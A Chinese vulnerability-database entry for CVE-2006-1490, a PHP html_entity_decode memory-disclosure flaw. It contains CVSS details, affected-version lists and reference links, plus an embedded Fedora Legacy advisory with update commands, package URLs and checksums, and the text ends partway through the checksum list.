CVE-2006-1490
CVSS5.0
发布时间 :2006-03-29 16:06:00
修订时间 :2011-03-07 21:33:11
NMCOPS    

[原文]PHP before 5.1.3-RC1 might allow remote attackers to obtain portions of memory via crafted binary data sent to a script that processes user input in the html_entity_decode function and sends the encoded results back to the client, aka a "binary safety" issue. NOTE: this issue has been referred to as a "memory leak," but it is an information leak that discloses memory contents.


[CNNVD]PHP html_entity_decode()函数信息泄露漏洞(CNNVD-200603-486)

        PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。
        PHP的html_entity_decode函数中存在输入验证错误。如果使用该函数的脚本接收了远程不可信任来源的输入的话,就会返回函数的结果,导致内存泄露。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:php:php:3.0.17PHP PHP 3.0.17
cpe:/a:php:php:5.0.0:rc1PHP PHP 5.0.0 RC1
cpe:/a:php:php:3.0.13PHP PHP 3.0.13
cpe:/a:php:php:5.0.0:beta3PHP PHP 5.0.0 Beta3
cpe:/a:php:php:4.0.1PHP PHP 4.0.1
cpe:/a:php:php:5.0.0:beta2PHP PHP 5.0.0 Beta2
cpe:/a:php:php:5.0.5PHP PHP 5.0.5
cpe:/a:php:php:5.0.0:rc3PHP PHP 5.0.0 RC3
cpe:/a:php:php:4.3.1PHP PHP 4.3.1
cpe:/a:php:php:4.3.10PHP PHP 4.3.10
cpe:/a:php:php:4.0.0PHP PHP 4.0.0
cpe:/a:php:php:4.3.7PHP PHP 4.3.7
cpe:/a:php:php:3.0.1PHP PHP 3.0.1
cpe:/a:php:php:4.2.0PHP PHP 4.2.0
cpe:/a:php:php:5.0.1PHP PHP 5.0.1
cpe:/a:php:php:3.0.14PHP PHP 3.0.14
cpe:/a:php:php:4.2.2PHP PHP 4.2.2
cpe:/a:php:php:5.0:rc1
cpe:/a:php:php:4.0.7:rc3
cpe:/a:php:php:4.0.2PHP PHP 4.0.2
cpe:/a:php:php:4.0.6PHP PHP 4.0.6
cpe:/a:php:php:5.0:rc3
cpe:/a:php:php:4.1.2PHP PHP 4.1.2
cpe:/a:php:php:4.0.5PHP PHP 4.0.5
cpe:/a:php:php:5.1.1PHP PHP 5.1.1
cpe:/a:php:php:4.2::dev
cpe:/a:php:php:4.3.6PHP PHP 4.3.6
cpe:/a:php:php:4.0.1:patch2
cpe:/a:php:php:4.3
cpe:/a:php:php:4.0.4PHP PHP 4.0.4
cpe:/a:php:php:4.4.2PHP PHP 4.4.2
cpe:/a:php:php:3.0.15PHP PHP 3.0.15
cpe:/a:php:php:5.0.4PHP PHP 5.0.4
cpe:/a:php:php:5.0.0:rc2PHP PHP 5.0.0 RC2
cpe:/a:php:php:4.3.4PHP PHP 4.3.4
cpe:/a:php:php:3.0.9PHP PHP 3.0.9
cpe:/a:php:php:4.0.3PHP PHP 4.0.3
cpe:/a:php:php:5.0:rc2
cpe:/a:php:php:4.3.2PHP PHP 4.3.2
cpe:/a:php:php:4.3.3PHP PHP 4.3.3
cpe:/a:php:php:3.0.16PHP PHP 3.0.16
cpe:/a:php:php:4.0.1:patch1
cpe:/a:php:php:3.0.2PHP PHP 3.0.2
cpe:/a:php:php:4.0.3:patch1
cpe:/a:php:php:5.1.2PHP PHP 5.1.2
cpe:/a:php:php:3.0.5PHP PHP 3.0.5
cpe:/a:php:php:5.1.0PHP PHP 5.1.0
cpe:/a:php:php:3.0.7PHP PHP 3.0.7
cpe:/a:php:php:4.0.7:rc2
cpe:/a:php:php:5.0.0PHP PHP 5.0.0
cpe:/a:php:php:5.0.2PHP PHP 5.0.2
cpe:/a:php:php:4.2.1PHP PHP 4.2.1
cpe:/a:php:php:4.4.1PHP PHP 4.4.1
cpe:/a:php:php:5.0.3PHP PHP 5.0.3
cpe:/a:php:php:3.0.11PHP PHP 3.0.11
cpe:/a:php:php:4.1.1PHP PHP 4.1.1
cpe:/a:php:php:3.0.6PHP PHP 3.0.6
cpe:/a:php:php:4.0.7PHP PHP 4.0.7
cpe:/a:php:php:3.0.10PHP PHP 3.0.10
cpe:/a:php:php:3.0.12PHP PHP 3.0.12
cpe:/a:php:php:4.3.11PHP PHP 4.3.11
cpe:/a:php:php:5.0.0:beta1PHP PHP 5.0.0 Beta1
cpe:/a:php:php:4.0.7:rc1
cpe:/a:php:php:3.0.8PHP PHP 3.0.8
cpe:/a:php:php:3.0.18PHP PHP 3.0.18
cpe:/a:php:php:5.0.0:beta4PHP PHP 5.0.0 Beta4
cpe:/a:php:php:4.3.8PHP PHP 4.3.8
cpe:/a:php:php:3.0.3PHP PHP 3.0.3
cpe:/a:php:php:4.1.0PHP PHP 4.1.0
cpe:/a:php:php:3.0PHP PHP 3.0
cpe:/a:php:php:4.4.0PHP PHP 4.4.0
cpe:/a:php:php:4.3.9PHP PHP 4.3.9
cpe:/a:php:php:3.0.4PHP PHP 3.0.4
cpe:/a:php:php:4.3.5PHP PHP 4.3.5
cpe:/a:php:php:4.2.3PHP PHP 4.2.3

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:11084PHP before 5.1.3-RC1 might allow remote attackers to obtain portions of memory via crafted binary data sent to a script that processes user ...
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1490
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1490
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200603-486
(官方数据源) CNNVD

- 其它链接及资源

http://www.us-cert.gov/cas/techalerts/TA06-333A.html
(UNKNOWN)  CERT  TA06-333A
http://cvs.php.net/viewcvs.cgi/php-src/ext/standard/html.c?r1=1.112&r2=1.113
(PATCH)  MISC  http://cvs.php.net/viewcvs.cgi/php-src/ext/standard/html.c?r1=1.112&r2=1.113
http://www.vupen.com/english/advisories/2006/4750
(UNKNOWN)  VUPEN  ADV-2006-4750
http://www.vupen.com/english/advisories/2006/2685
(UNKNOWN)  VUPEN  ADV-2006-2685
http://www.vupen.com/english/advisories/2006/1149
(UNKNOWN)  VUPEN  ADV-2006-1149
http://www.securityfocus.com/archive/1/archive/1/429164/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060328 Critical PHP bug - act ASAP if you are running web with sensitive data
http://www.securityfocus.com/archive/1/archive/1/429162/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060328 Re: [Full-disclosure] Critical PHP bug - act ASAP if you are running web with sensitive data
http://cvs.php.net/viewcvs.cgi/php-src/ext/standard/html.c?view=log
(UNKNOWN)  MISC  http://cvs.php.net/viewcvs.cgi/php-src/ext/standard/html.c?view=log
http://bugs.gentoo.org/show_bug.cgi?id=127939
(UNKNOWN)  CONFIRM  http://bugs.gentoo.org/show_bug.cgi?id=127939
http://xforce.iss.net/xforce/xfdb/25508
(UNKNOWN)  XF  php-htmlentitydecode-information-disclosure(25508)
http://www.ubuntu.com/usn/usn-320-1
(UNKNOWN)  UBUNTU  USN-320-1
http://www.trustix.org/errata/2006/0020
(UNKNOWN)  TRUSTIX  2006-0020
http://www.securityfocus.com/bid/17296
(UNKNOWN)  BID  17296
http://www.novell.com/linux/security/advisories/05-05-2006.html
(UNKNOWN)  SUSE  SUSE-SA:2006:024
http://www.mandriva.com/security/advisories?name=MDKSA-2006:063
(UNKNOWN)  MANDRIVA  MDKSA-2006:063
http://support.avaya.com/elmodocs2/security/ASA-2006-129.htm
(UNKNOWN)  CONFIRM  http://support.avaya.com/elmodocs2/security/ASA-2006-129.htm
http://security.gentoo.org/glsa/glsa-200605-08.xml
(UNKNOWN)  GENTOO  GLSA-200605-08
http://secunia.com/advisories/23155
(UNKNOWN)  SECUNIA  23155
http://secunia.com/advisories/21125
(UNKNOWN)  SECUNIA  21125
http://secunia.com/advisories/20951
(UNKNOWN)  SECUNIA  20951
http://secunia.com/advisories/20210
(UNKNOWN)  SECUNIA  20210
http://secunia.com/advisories/20052
(UNKNOWN)  SECUNIA  20052
http://secunia.com/advisories/19979
(UNKNOWN)  SECUNIA  19979
http://secunia.com/advisories/19832
(UNKNOWN)  SECUNIA  19832
http://secunia.com/advisories/19570
(UNKNOWN)  SECUNIA  19570
http://secunia.com/advisories/19499
(UNKNOWN)  SECUNIA  19499
http://secunia.com/advisories/19383
(UNKNOWN)  SECUNIA  19383
http://rhn.redhat.com/errata/RHSA-2006-0276.html
(UNKNOWN)  REDHAT  RHSA-2006:0276
http://lists.apple.com/archives/security-announce/2006/Nov/msg00001.html
(UNKNOWN)  APPLE  APPLE-SA-2006-11-28
http://docs.info.apple.com/article.html?artnum=304829
(UNKNOWN)  CONFIRM  http://docs.info.apple.com/article.html?artnum=304829
ftp://patches.sgi.com/support/free/security/advisories/20060501-01-U.asc
(UNKNOWN)  SGI  20060501-01-U

- 漏洞信息

PHP html_entity_decode()函数信息泄露漏洞
中危 输入验证
2006-03-29 00:00:00 2006-03-30 00:00:00
远程  
        PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。
        PHP的html_entity_decode函数中存在输入验证错误。如果使用该函数的脚本接收了远程不可信任来源的输入的话,就会返回函数的结果,导致内存泄露。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        http://www.php.net
        

- 漏洞信息 (F48756)

FLSA-2006-175040.txt (PacketStormID:F48756)
2006-08-03 00:00:00
 
advisory,php
linux,fedora
CVE-2005-2933,CVE-2005-3883,CVE-2006-0208,CVE-2006-0996,CVE-2006-1490,CVE-2006-1990
[点击下载]

Fedora Legacy Update Advisory FLSA:175040 - Updated PHP packages that fix multiple security issues are now available.

---------------------------------------------------------------------
               Fedora Legacy Update Advisory

Synopsis:          Updated php packages fix security issues
Advisory ID:       FLSA:175040
Issue date:        2006-07-27
Product:           Red Hat Linux, Fedora Core
Keywords:          Bugfix
CVE Names:         CVE-2005-2933 CVE-2005-3883 CVE-2006-0208
                   CVE-2006-0996 CVE-2006-1490 CVE-2006-1990
---------------------------------------------------------------------


---------------------------------------------------------------------
1. Topic:

Updated PHP packages that fix multiple security issues are now
available.

PHP is an HTML-embedded scripting language commonly used with the Apache
HTTP Web server.

2. Relevant releases/architectures:

Red Hat Linux 7.3 - i386
Red Hat Linux 9 - i386
Fedora Core 1 - i386
Fedora Core 2 - i386
Fedora Core 3 - i386, x86_64

3. Problem description:

A buffer overflow flaw was discovered in uw-imap, the University of
Washington's IMAP Server. php-imap is compiled against the static
c-client libraries from imap and therefore needed to be recompiled
against the fixed version. (CVE-2005-2933).

An input validation error was found in the "mb_send_mail()" function. An
attacker could use this flaw to inject arbitrary headers in a mail sent
via a script calling the "mb_send_mail()" function where the "To"
parameter can be controlled by the attacker. (CVE-2005-3883)

The error handling output was found to not properly escape HTML output
in certain cases. An attacker could use this flaw to perform cross-site
scripting attacks against sites where both display_errors and
html_errors are enabled. (CVE-2006-0208)

The phpinfo() PHP function did not properly sanitize long strings. An
attacker could use this to perform cross-site scripting attacks against
sites that have publicly-available PHP scripts that call phpinfo().
(CVE-2006-0996)

The html_entity_decode() PHP function was found to not be binary safe.
An attacker could use this flaw to disclose a certain part of the
memory. In order for this issue to be exploitable the target site would
need to have a PHP script which called the "html_entity_decode()"
function with untrusted input from the user and displayed the result.
(CVE-2006-1490)

The wordwrap() PHP function did not properly check for integer overflow
in the handling of the "break" parameter. An attacker who could control
the string passed to the "break" parameter could cause a heap overflow.
(CVE-2006-1990)

Users of PHP should upgrade to these updated packages, which contain
backported patches that resolve these issues.

4. Solution:

Before applying this update, make sure all previously released errata
relevant to your system have been applied.

To update all RPMs for your particular architecture, run:

rpm -Fvh [filenames]

where [filenames] is a list of the RPMs you wish to upgrade.  Only those
RPMs which are currently installed will be updated.  Those RPMs which
are not installed but included in the list will not be updated.  Note
that you can also use wildcards (*.rpm) if your current directory *only*
contains the desired RPMs.

Please note that this update is also available via yum and apt.  Many
people find this an easier way to apply updates.  To use yum issue:

yum update

or to use apt:

apt-get update; apt-get upgrade

This will start an interactive process that will result in the
appropriate RPMs being upgraded on your system.  This assumes that you
have yum or apt-get configured for obtaining Fedora Legacy content.
Please visit http://www.fedoralegacy.org/docs for directions on how to
configure yum and apt-get.

5. Bug IDs fixed:

https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=175040

6. RPMs required:

Red Hat Linux 7.3:
SRPM:
http://download.fedoralegacy.org/redhat/7.3/updates/SRPMS/php-4.1.2-7.3.20.legacy.src.rpm

i386:
http://download.fedoralegacy.org/redhat/7.3/updates/i386/php-4.1.2-7.3.20.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/php-devel-4.1.2-7.3.20.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/php-imap-4.1.2-7.3.20.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/php-ldap-4.1.2-7.3.20.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/php-manual-4.1.2-7.3.20.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/php-mysql-4.1.2-7.3.20.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/php-odbc-4.1.2-7.3.20.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/php-pgsql-4.1.2-7.3.20.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/php-snmp-4.1.2-7.3.20.legacy.i386.rpm

Red Hat Linux 9:

SRPM:
http://download.fedoralegacy.org/redhat/9/updates/SRPMS/php-4.2.2-17.21.legacy.src.rpm

i386:
http://download.fedoralegacy.org/redhat/9/updates/i386/php-4.2.2-17.21.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/php-devel-4.2.2-17.21.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/php-imap-4.2.2-17.21.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/php-ldap-4.2.2-17.21.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/php-manual-4.2.2-17.21.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/php-mysql-4.2.2-17.21.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/php-odbc-4.2.2-17.21.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/php-pgsql-4.2.2-17.21.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/php-snmp-4.2.2-17.21.legacy.i386.rpm

Fedora Core 1:

SRPM:
http://download.fedoralegacy.org/fedora/1/updates/SRPMS/php-4.3.11-1.fc1.6.legacy.src.rpm

i386:
http://download.fedoralegacy.org/fedora/1/updates/i386/php-4.3.11-1.fc1.6.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/php-devel-4.3.11-1.fc1.6.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/php-domxml-4.3.11-1.fc1.6.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/php-imap-4.3.11-1.fc1.6.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/php-ldap-4.3.11-1.fc1.6.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/php-mbstring-4.3.11-1.fc1.6.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/php-mysql-4.3.11-1.fc1.6.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/php-odbc-4.3.11-1.fc1.6.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/php-pgsql-4.3.11-1.fc1.6.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/php-snmp-4.3.11-1.fc1.6.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/php-xmlrpc-4.3.11-1.fc1.6.legacy.i386.rpm

Fedora Core 2:

SRPM:
http://download.fedoralegacy.org/fedora/2/updates/SRPMS/php-4.3.11-1.fc2.7.legacy.src.rpm

i386:
http://download.fedoralegacy.org/fedora/2/updates/i386/php-4.3.11-1.fc2.7.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/2/updates/i386/php-devel-4.3.11-1.fc2.7.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/2/updates/i386/php-domxml-4.3.11-1.fc2.7.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/2/updates/i386/php-imap-4.3.11-1.fc2.7.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/2/updates/i386/php-ldap-4.3.11-1.fc2.7.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/2/updates/i386/php-mbstring-4.3.11-1.fc2.7.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/2/updates/i386/php-mysql-4.3.11-1.fc2.7.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/2/updates/i386/php-odbc-4.3.11-1.fc2.7.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/2/updates/i386/php-pear-4.3.11-1.fc2.7.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/2/updates/i386/php-pgsql-4.3.11-1.fc2.7.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/2/updates/i386/php-snmp-4.3.11-1.fc2.7.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/2/updates/i386/php-xmlrpc-4.3.11-1.fc2.7.legacy.i386.rpm

Fedora Core 3:

SRPM:
http://download.fedoralegacy.org/fedora/3/updates/SRPMS/php-4.3.11-2.8.4.legacy.src.rpm

i386:
http://download.fedoralegacy.org/fedora/3/updates/i386/php-4.3.11-2.8.4.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/3/updates/i386/php-devel-4.3.11-2.8.4.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/3/updates/i386/php-domxml-4.3.11-2.8.4.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/3/updates/i386/php-gd-4.3.11-2.8.4.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/3/updates/i386/php-imap-4.3.11-2.8.4.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/3/updates/i386/php-ldap-4.3.11-2.8.4.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/3/updates/i386/php-mbstring-4.3.11-2.8.4.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/3/updates/i386/php-mysql-4.3.11-2.8.4.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/3/updates/i386/php-ncurses-4.3.11-2.8.4.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/3/updates/i386/php-odbc-4.3.11-2.8.4.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/3/updates/i386/php-pear-4.3.11-2.8.4.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/3/updates/i386/php-pgsql-4.3.11-2.8.4.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/3/updates/i386/php-snmp-4.3.11-2.8.4.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/3/updates/i386/php-xmlrpc-4.3.11-2.8.4.legacy.i386.rpm

x86_64:
http://download.fedoralegacy.org/fedora/3/updates/x86_64/php-4.3.11-2.8.4.legacy.x86_64.rpm
http://download.fedoralegacy.org/fedora/3/updates/x86_64/php-devel-4.3.11-2.8.4.legacy.x86_64.rpm
http://download.fedoralegacy.org/fedora/3/updates/x86_64/php-domxml-4.3.11-2.8.4.legacy.x86_64.rpm
http://download.fedoralegacy.org/fedora/3/updates/x86_64/php-gd-4.3.11-2.8.4.legacy.x86_64.rpm
http://download.fedoralegacy.org/fedora/3/updates/x86_64/php-imap-4.3.11-2.8.4.legacy.x86_64.rpm
http://download.fedoralegacy.org/fedora/3/updates/x86_64/php-ldap-4.3.11-2.8.4.legacy.x86_64.rpm
http://download.fedoralegacy.org/fedora/3/updates/x86_64/php-mbstring-4.3.11-2.8.4.legacy.x86_64.rpm
http://download.fedoralegacy.org/fedora/3/updates/x86_64/php-mysql-4.3.11-2.8.4.legacy.x86_64.rpm
http://download.fedoralegacy.org/fedora/3/updates/x86_64/php-ncurses-4.3.11-2.8.4.legacy.x86_64.rpm
http://download.fedoralegacy.org/fedora/3/updates/x86_64/php-odbc-4.3.11-2.8.4.legacy.x86_64.rpm
http://download.fedoralegacy.org/fedora/3/updates/x86_64/php-pear-4.3.11-2.8.4.legacy.x86_64.rpm
http://download.fedoralegacy.org/fedora/3/updates/x86_64/php-pgsql-4.3.11-2.8.4.legacy.x86_64.rpm
http://download.fedoralegacy.org/fedora/3/updates/x86_64/php-snmp-4.3.11-2.8.4.legacy.x86_64.rpm
http://download.fedoralegacy.org/fedora/3/updates/x86_64/php-xmlrpc-4.3.11-2.8.4.legacy.x86_64.rpm


7. Verification:

SHA1 sum                                 Package Name
---------------------------------------------------------------------

rh73:
716216fdf1ddc42bb8d210d1e121ba8d0e7f4d7c
redhat/7.3/updates/i386/php-4.1.2-7.3.20.legacy.i386.rpm
61612a0c2e6244ccfb4e35ea04865d48f75f7c48
redhat/7.3/updates/i386/php-devel-4.1.2-7.3.20.legacy.i386.rpm
d29efdfdd669875715c0956fedc59b99ef7681f3
redhat/7.3/updates/i386/php-imap-4.1.2-7.3.20.legacy.i386.rpm
1e09ae807ccf160ef9011818d4dda590bab224d7
redhat/7.3/updates/i386/php-ldap-4.1.2-7.3.20.legacy.i386.rpm
0dfa25adffe75db47fbf2a366eb456d8fcfca918
redhat/7.3/updates/i386/php-manual-4.1.2-7.3.20.legacy.i386.rpm
9141e782d32739b5bc2a9b611d7cdc352e523c26
redhat/7.3/updates/i386/php-mysql-4.1.2-7.3.20.legacy.i386.rpm
f1e88cf8e7f644f81473efc561f4df502ef7bc24
redhat/7.3/updates/i386/php-odbc-4.1.2-7.3.20.legacy.i386.rpm
dd58b7187e116874558c5567b8c6897d1d1d4154
redhat/7.3/updates/i386/php-pgsql-4.1.2-7.3.20.legacy.i386.rpm
0575467b89a44d1e5b0bebc00fac018666a8b827
redhat/7.3/updates/i386/php-snmp-4.1.2-7.3.20.legacy.i386.rpm
8541c7eefbf6162eeca5f12f834ccf3af8fee85b
redhat/7.3/updates/SRPMS/php-4.1.2-7.3.20.legacy.src.rpm

rh9:
1cd4a11bf52c1b18dce2937a7f15789b059c1967
redhat/9/updates/i386/php-4.2.2-17.21.legacy.i386.rpm
109a96dc0633b661e6789d9b41a3cf298e140401
redhat/9/updates/i386/php-devel-4.2.2-17.21.legacy.i386.rpm
f5df6f259745f0050c15a50b75e2114381c07fb1
redhat/9/updates/i386/php-imap-4.2.2-17.21.legacy.i386.rpm
8223f6cc4e84478523cd8560bdc9b75d90c33a14
redhat/9/updates/i386/php-ldap-4.2.2-17.21.legacy.i386.rpm
18ac761d897ba89e94086facdb7b529e7d60c0e2
redhat/9/updates/i386/php-manual-4.2.2-17.21.legacy.i386.rpm
714057b386abaa03573d14c8757ef97858ba2b17
redhat/9/updates/i386/php-mysql-4.2.2-17.21.legacy.i386.rpm
c2002f4f520ea2f7dbe11402ad460a181c44175a
redhat/9/updates/i386/php-odbc-4.2.2-17.21.legacy.i386.rpm
26a858731e032c0622003c8d9398a6b5ead86b24
redhat/9/updates/i386/php-pgsql-4.2.2-17.21.legacy.i386.rpm
258887bd3e690dad1b88dfcbc280a8523fa52338
redhat/9/updates/i386/php-snmp-4.2.2-17.21.legacy.i386.rpm
fe815ab1d505fcef7629e0abe4b25f2c66054f1c
redhat/9/updates/SRPMS/php-4.2.2-17.21.legacy.src.rpm

fc1:
5cc63a63de0057797737ceefbdfeb0f466d87beb
fedora/1/updates/i386/php-4.3.11-1.fc1.6.legacy.i386.rpm
315b0ae174f33d437178982f47dd24ba48848346
fedora/1/updates/i386/php-devel-4.3.11-1.fc1.6.legacy.i386.rpm
92d36fe3e062b33e6b22bcd101dd85dc03803616
fedora/1/updates/i386/php-domxml-4.3.11-1.fc1.6.legacy.i386.rpm
7083eb87cdcb9e83ef83e6ba7aee63a2a259ce89
fedora/1/updates/i386/php-imap-4.3.11-1.fc1.6.legacy.i386.rpm
acb18926452c2faf331fc8b25a09de3f4da2d7cb
fedora/1/updates/i386/php-ldap-4.3.11-1.fc1.6.legacy.i386.rpm
c90c744840ebff6c9149b9df9513db63a10a6247
fedora/1/updates/i386/php-mbstring-4.3.11-1.fc1.6.legacy.i386.rpm
e84b242476b61b0aa19b2b71af4f69043cc4ecee
fedora/1/updates/i386/php-mysql-4.3.11-1.fc1.6.legacy.i386.rpm
a765f1e3d73d9d5cbd1fb5cbfb868f70baf2ce4a
fedora/1/updates/i386/php-odbc-4.3.11-1.fc1.6.legacy.i386.rpm
0ef956e24befd3a9b462f0953edc164595ac27cf
fedora/1/updates/i386/php-pgsql-4.3.11-1.fc1.6.legacy.i386.rpm
e5e9f011f9d403881a9350d5395db6ccaa402b6a
fedora/1/updates/i386/php-snmp-4.3.11-1.fc1.6.legacy.i386.rpm
f29d6f88cd780e32e9307c1d8ad8446e559c8a29
fedora/1/updates/i386/php-xmlrpc-4.3.11-1.fc1.6.legacy.i386.rpm
edbf95d5ea4944e3a41ccebcebaf2702b4545f98
fedora/1/updates/SRPMS/php-4.3.11-1.fc1.6.legacy.src.rpm

fc2:
f2ec94d1069ff3214ac031f7f5c6a1e29f22e90d
fedora/2/updates/i386/php-4.3.11-1.fc2.7.legacy.i386.rpm
34c8d44ccd71a3f09dc289d4f0fc826dc34f9a60
fedora/2/updates/i386/php-devel-4.3.11-1.fc2.7.legacy.i386.rpm
09d8100aea583b0b47f87190b6a557ed3f7e3636
fedora/2/updates/i386/php-domxml-4.3.11-1.fc2.7.legacy.i386.rpm
f11bc7846717d98b73e73d9bf9870b2f5e19d341
fedora/2/updates/i386/php-imap-4.3.11-1.fc2.7.legacy.i386.rpm
69d11e09f15a6acb488a28a8e4751f468e332c73
fedora/2/updates/i386/php-ldap-4.3.11-1.fc2.7.legacy.i386.rpm
a07b390dc004d6a330c49cf1e8262471c93e9108
fedora/2/updates/i386/php-mbstring-4.3.11-1.fc2.7.legacy.i386.rpm
2820fb1d8832d034b2529ec7087c5839baebccfe
fedora/2/updates/i386/php-mysql-4.3.11-1.fc2.7.legacy.i386.rpm
ed69c77a9e312348a6ca73ad2d7f270459bc16dc
fedora/2/updates/i386/php-odbc-4.3.11-1.fc2.7.legacy.i386.rpm
5ff64a9b70c418ce762ff815be8fcefb5aa89d15
fedora/2/updates/i386/php-pear-4.3.11-1.fc2.7.legacy.i386.rpm
9251da041356734713a644ff778ae4afc2ab2879
fedora/2/updates/i386/php-pgsql-4.3.11-1.fc2.7.legacy.i386.rpm
eabd9dd422934c99902429c311f61a4a4a26e3c7
fedora/2/updates/i386/php-snmp-4.3.11-1.fc2.7.legacy.i386.rpm
7b027d1cd8844312ed20711bef92013078e33b83
fedora/2/updates/i386/php-xmlrpc-4.3.11-1.fc2.7.legacy.i386.rpm
026b3dd063586fe6e29f6cb482206e4f5631ac0f
fedora/2/updates/SRPMS/php-4.3.11-1.fc2.7.legacy.src.rpm

fc3:
cafefc39811f7923007e522aa5ca84a0e073dd96
fedora/3/updates/i386/php-4.3.11-2.8.4.legacy.i386.rpm
e2d84ad62c2703b5a7f3875d0d52e9461f5f81fe
fedora/3/updates/i386/php-devel-4.3.11-2.8.4.legacy.i386.rpm
7b90726025ff13e815509216a73fa9c2914a6ad0
fedora/3/updates/i386/php-domxml-4.3.11-2.8.4.legacy.i386.rpm
6367004e4200fcb44778088c911495458b08cde4
fedora/3/updates/i386/php-gd-4.3.11-2.8.4.legacy.i386.rpm
abb3cdd3dcc030b85e03a409372daac6093a63d0
fedora/3/updates/i386/php-imap-4.3.11-2.8.4.legacy.i386.rpm
df673e8e983ea6cec3b50f65e50950f625493223
fedora/3/updates/i386/php-ldap-4.3.11-2.8.4.legacy.i386.rpm
4e95b2f44661683fd17c72f881323f36757793ef
fedora/3/updates/i386/php-mbstring-4.3.11-2.8.4.legacy.i386.rpm
a891c751c82acc9bf1cc6ac59332196344b42a8c
fedora/3/updates/i386/php-mysql-4.3.11-2.8.4.legacy.i386.rpm
865dde39429ac6fc59296af9ed938c4e7b30216c
fedora/3/updates/i386/php-ncurses-4.3.11-2.8.4.legacy.i386.rpm
32b5075e4e3406c4ab9715ef970f1e5ec4f808e3
fedora/3/updates/i386/php-odbc-4.3.11-2.8.4.legacy.i386.rpm
5867c11e75d26edbcd79e815bc79a1c2354878ec
fedora/3/updates/i386/php-pear-4.3.11-2.8.4.legacy.i386.rpm
5f05fae3bc0ef2841ed479cb5968443fee448698
fedora/3/updates/i386/php-pgsql-4.3.11-2.8.4.legacy.i386.rpm
71591b13628f0db7a0818c9bb818b63e176c9904
fedora/3/updates/i386/php-snmp-4.3.11-2.8.4.legacy.i386.rpm
c5f9dcb4c6e8bc117b88ffa06a60049a80f68287
fedora/3/updates/i386/php-xmlrpc-4.3.11-2.8.4.legacy.i386.rpm
78fb1d65369f96b86027bc04e91d2c058fbd1e73
fedora/3/updates/x86_64/php-4.3.11-2.8.4.legacy.x86_64.rpm
102f14f60d3dc134cb6f698f6d4d1f4264006940
fedora/3/updates/x86_64/php-devel-4.3.11-2.8.4.legacy.x86_64.rpm
333d7213daf29f486ad7e047e1adc418c3258500
fedora/3/updates/x86_64/php-domxml-4.3.11-2.8.4.legacy.x86_64.rpm
59c18b269a3a1712684d8fab00c7577033ac2108
